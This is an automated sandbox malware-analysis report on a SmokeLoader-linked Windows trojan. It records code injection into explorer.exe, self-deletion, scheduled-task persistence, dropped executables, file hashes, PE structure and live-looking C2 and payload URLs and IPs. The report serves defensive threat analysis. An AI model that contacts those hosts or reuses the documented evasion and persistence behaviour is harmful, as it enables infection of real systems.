      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532225 Sample: mGFoU1INUk.exe Startdate: 12/10/2024 Architecture: WINDOWS Score: 100 25 nwgrus.ru 2->25 41 Multi AV Scanner detection for domain / URL 2->41 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 7 other signatures 2->47 7 mGFoU1INUk.exe 2->7         started        10 ibjgueh 2->10         started        12 ibjgueh 2->12         started        signatures3 process4 signatures5 49 Detected unpacking (changes PE section rights) 7->49 51 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->51 53 Maps a DLL or memory area into another process 7->53 61 2 other signatures 7->61 14 explorer.exe 92 5 7->14 injected 55 Multi AV Scanner detection for dropped file 10->55 57 Machine Learning detection for dropped file 10->57 59 Checks if the current machine is a virtual machine (disk enumeration) 10->59 process6 dnsIp7 27 23.145.40.164, 443, 50001 SURFAIRWIRELESS-IN-01US Reserved 14->27 29 175.119.10.231, 60089, 60090, 60091 SKB-ASSKBroadbandCoLtdKR Korea Republic of 14->29 31 nwgrus.ru 119.204.11.2, 49792, 49799, 49809 KIXS-AS-KRKoreaTelecomKR Korea Republic of 14->31 19 C:\Users\user\AppData\Roaming\ibjgueh, PE32 14->19 dropped 21 C:\Users\user\AppData\Local\Temp\B995.exe, PE32 14->21 dropped 23 C:\Users\user\...\ibjgueh:Zone.Identifier, ASCII 14->23 dropped 33 System process connects to network (likely due to code injection or exploit) 14->33 35 Benign windows process drops PE files 14->35 37 Deletes itself after installation 14->37 39 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->39 file8 signatures9

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      mGFoU1INUk.exe37%ReversingLabs
      mGFoU1INUk.exe36%VirustotalBrowse
      mGFoU1INUk.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\ibjgueh100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\B995.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\ibjgueh37%ReversingLabs
      C:\Users\user\AppData\Roaming\ibjgueh36%VirustotalBrowse
      No Antivirus matches
      SourceDetectionScannerLabelLink
      nwgrus.ru12%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://powerpoint.office.comcember0%URL Reputationsafe
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
      https://api.msn.com/0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      http://crl.v0%URL Reputationsafe
      https://outlook.com0%URL Reputationsafe
      http://tech-servers.in.net/tmp/index.php2%VirustotalBrowse
      http://unicea.ws/tmp/index.php0%VirustotalBrowse
      https://23.145.40.164/ksa9104.exe0%VirustotalBrowse
      http://nwgrus.ru/tmp/index.php17%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      nwgrus.ru
      119.204.11.2
      truetrueunknown
      NameMaliciousAntivirus DetectionReputation
      http://tech-servers.in.net/tmp/index.phptrueunknown
      https://23.145.40.164/ksa9104.exetrueunknown
      http://unicea.ws/tmp/index.phptrueunknown
      http://nwgrus.ru/tmp/index.phptrueunknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://word.office.comonexplorer.exe, 00000002.00000000.2125963281.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
        unknown
        https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2123955019.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://powerpoint.office.comcemberexplorer.exe, 00000002.00000000.2130431930.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000000.2130431930.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://api.msn.com/explorer.exe, 00000002.00000000.2125963281.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://excel.office.comexplorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://schemas.microexplorer.exe, 00000002.00000000.2125269917.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2125238364.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2124617675.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://crl.vexplorer.exe, 00000002.00000000.2122001915.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://outlook.comexplorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://wns.windows.com/)sexplorer.exe, 00000002.00000000.2125963281.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          23.145.40.164
          unknownReserved
          22631SURFAIRWIRELESS-IN-01UStrue
          119.204.11.2
          nwgrus.ruKorea Republic of
          4766KIXS-AS-KRKoreaTelecomKRtrue
          175.119.10.231
          unknownKorea Republic of
          9318SKB-ASSKBroadbandCoLtdKRtrue
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1532225
          Start date and time:2024-10-12 20:06:05 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 8m 23s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:6
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:1
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:mGFoU1INUk.exe
          renamed because original name is a hash value
          Original Sample Name:18daa2c6a6f6385895582d4e9954d851.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@4/3@6/3
          EGA Information:
          • Successful, ratio: 66.7%
          HCA Information:
          • Successful, ratio: 97%
          • Number of executed functions: 36
          • Number of non-executed functions: 13
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240000 for current running targets taking high CPU consumption
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target ibjgueh, PID 2604 because there are no executed function
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          TimeTypeDescription
          14:07:13API Interceptor451041x Sleep call for process: explorer.exe modified
          20:07:24Task SchedulerRun new task: Firefox Default Browser Agent F1A7C47CB515062F path: C:\Users\user\AppData\Roaming\ibjgueh
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          23.145.40.164uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
            wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
              bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                  PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                    IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                      Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                        T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                          O4zPA1oI9Y.exeGet hashmaliciousSmokeLoaderBrowse
                            5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                              119.204.11.2file.exeGet hashmaliciousSmokeLoaderBrowse
                              • nwgrus.ru/tmp/index.php
                              rBwTlpgnjc.exeGet hashmaliciousSmokeLoaderBrowse
                              • nidoe.org/tmp/index.php
                              175.119.10.231mLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                              • epohe.ru/tmp/
                              Ltoj8zXMGf.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                              • 100xmargin.com/tmp/index.php
                              kCiQWUqQtC.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                              • 100xmargin.com/tmp/index.php
                              setup.exeGet hashmaliciousBabuk, DjvuBrowse
                              • cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true
                              SWjcpYfYPy.exeGet hashmaliciousSmokeLoaderBrowse
                              • gebeus.ru/tmp/index.php
                              file.exeGet hashmaliciousSmokeLoaderBrowse
                              • gebeus.ru/tmp/index.php
                              file.exeGet hashmaliciousSmokeLoaderBrowse
                              • gebeus.ru/tmp/index.php
                              n8XBpFdVFU.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                              • sdfjhuz.com/dl/build2.exe
                              SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                              • sdfjhuz.com/dl/build2.exe
                              2LksWs2xq7.exeGet hashmaliciousSmokeLoaderBrowse
                              • nidoe.org/tmp/index.php
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              nwgrus.ruuSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                              • 190.224.203.37
                              wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                              • 116.58.10.60
                              bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                              • 190.147.2.86
                              LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                              • 187.211.161.52
                              PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                              • 92.36.226.66
                              IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                              • 201.103.8.135
                              Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                              • 190.224.203.37
                              T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                              • 210.182.29.70
                              O4zPA1oI9Y.exeGet hashmaliciousSmokeLoaderBrowse
                              • 160.177.223.165
                              5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                              • 181.52.122.51
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              SKB-ASSKBroadbandCoLtdKRna.elfGet hashmaliciousMiraiBrowse
                              • 222.238.145.97
                              na.elfGet hashmaliciousUnknownBrowse
                              • 39.122.198.97
                              na.elfGet hashmaliciousMiraiBrowse
                              • 222.238.145.88
                              na.elfGet hashmaliciousMiraiBrowse
                              • 1.253.35.1
                              na.elfGet hashmaliciousMiraiBrowse
                              • 1.235.113.234
                              na.elfGet hashmaliciousMiraiBrowse
                              • 1.248.72.126
                              6DroQ0jTFY.elfGet hashmaliciousMiraiBrowse
                              • 58.122.30.38
                              cqdEWgq9fW.elfGet hashmaliciousMiraiBrowse
                              • 114.204.119.182
                              dNBHFhYkoO.elfGet hashmaliciousMirai, OkiruBrowse
                              • 58.232.149.105
                              0aEXGHNxhO.elfGet hashmaliciousMirai, OkiruBrowse
                              • 116.124.181.132
                              KIXS-AS-KRKoreaTelecomKRna.elfGet hashmaliciousMiraiBrowse
                              • 14.128.205.96
                              na.elfGet hashmaliciousUnknownBrowse
                              • 211.55.129.167
                              na.elfGet hashmaliciousMiraiBrowse
                              • 14.86.131.44
                              na.elfGet hashmaliciousMiraiBrowse
                              • 220.89.51.156
                              na.elfGet hashmaliciousMiraiBrowse
                              • 175.239.198.64
                              na.elfGet hashmaliciousMiraiBrowse
                              • 125.129.129.17
                              na.elfGet hashmaliciousMiraiBrowse
                              • 14.59.217.120
                              na.elfGet hashmaliciousMiraiBrowse
                              • 14.86.106.47
                              na.elfGet hashmaliciousMiraiBrowse
                              • 1.109.151.172
                              na.elfGet hashmaliciousMiraiBrowse
                              • 14.85.6.142
                              SURFAIRWIRELESS-IN-01USuSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              O4zPA1oI9Y.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              72a589da586844d7f0818ce684948eeauSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              O4zPA1oI9Y.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                              • 23.145.40.164
                              No context
                              Process:C:\Windows\explorer.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:modified
                              Size (bytes):167865
                              Entropy (8bit):6.197261972623414
                              Encrypted:false
                              SSDEEP:3072:GTAGy4uRrZA2NHJAgrOKePxcq55Q+CoNJk:GTAGyKurN+F4
                              MD5:FB7D3959E02DD0DE0E7548C6F7CB2C5D
                              SHA1:46CE9F287A834D1AC9970CD8463AB15F402CF51C
                              SHA-256:C741E33C801163A9CCBC88DEA39D63B4ECF1A3E533363C925B21EEEBF06576CF
                              SHA-512:5D888B9E3289EE384655DBDB04ADF529DB1455A8BB35D3F3E24865BE4A518CC6D8116123304413369655835B4B32D4B2DDFAAC2C2BEF240A51778B3D7E4EB584
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y..*..*..*...*..*...*..*...*...*.F.*..*..*...*...*..*...*..*...*..*Rich..*........................PE..L.....Bd.................N....r..............`....@...........................s.....>.......................................tw..<.....r..............................................................................`..|............................text....L.......N.................. ..`.rdata..& ...`..."...R..............@..@.data...|.o..........t..............@....kepojon.D....q..8..................@....mizur...(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\explorer.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):243200
                              Entropy (8bit):5.891193199564729
                              Encrypted:false
                              SSDEEP:3072:iTAAHnZJKzRKc6jdtPcTui/scq5vQ+CoNAMenJFBxqXYUGrG:iTAa7PCTd+FSMe/qI
                              MD5:18DAA2C6A6F6385895582D4E9954D851
                              SHA1:88F22A473DF849C91E70A91A8376ABFF2B5B108F
                              SHA-256:346085FE3603FBC085F801241CCCDC4D3765929A6CD5F9906CBCFCD6657065A3
                              SHA-512:552A9FFBB3A80495A523D7052E940677778AEED5A9569459029A71A4D45CF568CE447A4E79EFEA786CA4220B913F11CE1B4F8819AF48C7078430AEF2DA090F8F
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 37%
                              • Antivirus: Virustotal, Detection: 36%, Browse
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y..*..*..*...*..*...*..*...*...*.F.*..*..*...*...*..*...*..*...*..*Rich..*........................PE..L...Q..f.................P....r..............`....@...........................s......x......................................tw..<.....r..............................................................................`..|............................text....O.......P.................. ..`.rdata..& ...`..."...T..............@..@.data...|.o..........v..............@....suhak...D....q..8..................@....fofifuf.(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\explorer.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Reputation:high, very likely benign file
                              Preview:[ZoneTransfer]....ZoneId=0
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):5.891193199564729
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.53%
                              • InstallShield setup (43055/19) 0.43%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:mGFoU1INUk.exe
                              File size:243'200 bytes
                              MD5:18daa2c6a6f6385895582d4e9954d851
                              SHA1:88f22a473df849c91e70a91a8376abff2b5b108f
                              SHA256:346085fe3603fbc085f801241cccdc4d3765929a6cd5f9906cbcfcd6657065a3
                              SHA512:552a9ffbb3a80495a523d7052e940677778aeed5a9569459029a71a4d45cf568ce447a4e79efea786ca4220b913f11ce1b4f8819af48c7078430aef2da090f8f
                              SSDEEP:3072:iTAAHnZJKzRKc6jdtPcTui/scq5vQ+CoNAMenJFBxqXYUGrG:iTAa7PCTd+FSMe/qI
                              TLSH:D1342BC26EF17815F2B3CA31DE3992E4E52FF5D29E24725D21A4DA0F08F11A1D92B712
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y...*...*...*...*...*...*...*...*...*.F.*...*...*...*...*...*...*...*...*...*Rich...*........................PE..L...Q..f...
                              Icon Hash:738733b18ba383e4
                              Entrypoint:0x4018e4
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                              Time Stamp:0x661CE451 [Mon Apr 15 08:24:49 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:0
                              File Version Major:5
                              File Version Minor:0
                              Subsystem Version Major:5
                              Subsystem Version Minor:0
                              Import Hash:636068238a0ab0df9c8e341eee8428d0
                              Instruction
                              call 00007FE54CFF8230h
                              jmp 00007FE54CFF4B2Dh
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              sub esp, 00000328h
                              mov dword ptr [0041A3D0h], eax
                              mov dword ptr [0041A3CCh], ecx
                              mov dword ptr [0041A3C8h], edx
                              mov dword ptr [0041A3C4h], ebx
                              mov dword ptr [0041A3C0h], esi
                              mov dword ptr [0041A3BCh], edi
                              mov word ptr [0041A3E8h], ss
                              mov word ptr [0041A3DCh], cs
                              mov word ptr [0041A3B8h], ds
                              mov word ptr [0041A3B4h], es
                              mov word ptr [0041A3B0h], fs
                              mov word ptr [0041A3ACh], gs
                              pushfd
                              pop dword ptr [0041A3E0h]
                              mov eax, dword ptr [ebp+00h]
                              mov dword ptr [0041A3D4h], eax
                              mov eax, dword ptr [ebp+04h]
                              mov dword ptr [0041A3D8h], eax
                              lea eax, dword ptr [ebp+08h]
                              mov dword ptr [0041A3E4h], eax
                              mov eax, dword ptr [ebp-00000320h]
                              mov dword ptr [0041A320h], 00010001h
                              mov eax, dword ptr [0041A3D8h]
                              mov dword ptr [0041A2D4h], eax
                              mov dword ptr [0041A2C8h], C0000409h
                              mov dword ptr [0041A2CCh], 00000001h
                              mov eax, dword ptr [00419008h]
                              mov dword ptr [ebp-00000328h], eax
                              mov eax, dword ptr [0041900Ch]
                              mov dword ptr [ebp-00000324h], eax
                              call dword ptr [000000DCh]
                              Programming Language:
                              • [C++] VS2008 build 21022
                              • [ASM] VS2008 build 21022
                              • [ C ] VS2008 build 21022
                              • [IMP] VS2005 build 50727
                              • [RES] VS2008 build 21022
                              • [LNK] VS2008 build 21022
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x177740x3c.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x27210000x1cac0.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x160000x17c.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x14faf0x150006dc5e30b5d87861babcd358eb53f2106False0.8236374627976191data7.549565623085082IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x160000x20260x22006da4b7c2534b0027fef7635e158ee334False0.36247702205882354data5.4153798035975225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x190000x26fff7c0x14003cba851d696b61283dc196131a3cd2a4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .suhak0x27190000x44000x3800b211778b80f6d441b6cf61ada776fc6dFalse0.0025809151785714285data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .fofifuf0x271e0000x28000x28001276481102f218c981e0324180bafd9fFalse0.00322265625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x27210000x1cac00x1cc00a27998791c525f409926d67585ed7489False0.4417119565217391data5.078965960078043IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0x27219d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5700959488272921
                              RT_ICON0x27228780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6371841155234657
                              RT_ICON0x27231200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6935483870967742
                              RT_ICON0x27237e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7456647398843931
                              RT_ICON0x2723d500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5137966804979253
                              RT_ICON0x27262f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6128048780487805
                              RT_ICON0x27273a00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6180327868852459
                              RT_ICON0x2727d280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7570921985815603
                              RT_ICON0x27282080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.3342217484008529
                              RT_ICON0x27290b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.526173285198556
                              RT_ICON0x27299580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.5892857142857143
                              RT_ICON0x272a0200x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6329479768786127
                              RT_ICON0x272a5880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.4270746887966805
                              RT_ICON0x272cb300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.5057377049180328
                              RT_ICON0x272d4b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.5044326241134752
                              RT_ICON0x272d9880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39498933901918976
                              RT_ICON0x272e8300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5546028880866426
                              RT_ICON0x272f0d80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6169354838709677
                              RT_ICON0x272f7a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6423410404624278
                              RT_ICON0x272fd080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.42706378986866794
                              RT_ICON0x2730db00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4245901639344262
                              RT_ICON0x27317380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.4645390070921986
                              RT_ICON0x2731c080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.28331556503198296
                              RT_ICON0x2732ab00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.36913357400722024
                              RT_ICON0x27333580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.37672811059907835
                              RT_ICON0x2733a200x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.3786127167630058
                              RT_ICON0x2733f880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.25778008298755184
                              RT_ICON0x27365300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.275328330206379
                              RT_ICON0x27375d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.28647540983606556
                              RT_ICON0x2737f600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.32358156028368795
                              RT_STRING0x27385f80xccdata0.553921568627451
                              RT_STRING0x27386c80x50cdata0.4473684210526316
                              RT_STRING0x2738bd80x3aadata0.4616204690831556
                              RT_STRING0x2738f880x52cdata0.4516616314199396
                              RT_STRING0x27394b80x652data0.4338689740420272
                              RT_STRING0x2739b100x798data0.41975308641975306
                              RT_STRING0x273a2a80x84cdata0.4129001883239171
                              RT_STRING0x273aaf80x666data0.4340659340659341
                              RT_STRING0x273b1600x7f6data0.4210009813542689
                              RT_STRING0x273b9580x758data0.41914893617021276
                              RT_STRING0x273c0b00x78cdata0.4254658385093168
                              RT_STRING0x273c8400x666data0.4340659340659341
                              RT_STRING0x273cea80x69edata0.4268004722550177
                              RT_STRING0x273d5480x54cdata0.44026548672566373
                              RT_STRING0x273da980x26data0.5526315789473685
                              RT_GROUP_ICON0x272d9200x68dataTurkishTurkey0.7019230769230769
                              RT_GROUP_ICON0x27383c80x76dataTurkishTurkey0.6779661016949152
                              RT_GROUP_ICON0x27281900x76dataTurkishTurkey0.6610169491525424
                              RT_GROUP_ICON0x2731ba00x68dataTurkishTurkey0.7211538461538461
                              RT_VERSION0x27384400x1b4data0.5848623853211009
                              DLLImport
